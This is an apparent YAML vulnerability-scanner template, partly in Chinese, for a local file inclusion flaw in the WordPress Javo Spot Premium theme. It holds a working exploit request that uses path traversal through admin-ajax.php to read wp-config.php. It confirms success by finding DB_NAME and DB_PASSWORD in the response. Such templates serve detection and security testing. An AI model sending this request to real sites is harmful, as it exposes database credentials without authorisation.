product: WordPress
vName: WordPress Javo Spot Premium Theme - Local File Inclusion
type: 文件读取
vID: [ ]
level: 3
vDesc: WordPress Javo Spot Premium Theme is vulnerable to local file inclusion that allows remote unauthenticated attackers access to locally stored file and return their content.
version: ''
note: ''
search: { }
protocol: http
link: https://codeseekah.com/2017/02/09/javo-themes-spot-lfi-vulnerability/
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /wp-admin/admin-ajax.php?jvfrm_spot_get_json&fn=../../wp-config.php&callback=jQuery
    verify:
      logic: and
      check:
        - body:
            value:
              - DB_NAME
              - DB_PASSWORD
            logic: and
        - status: 200
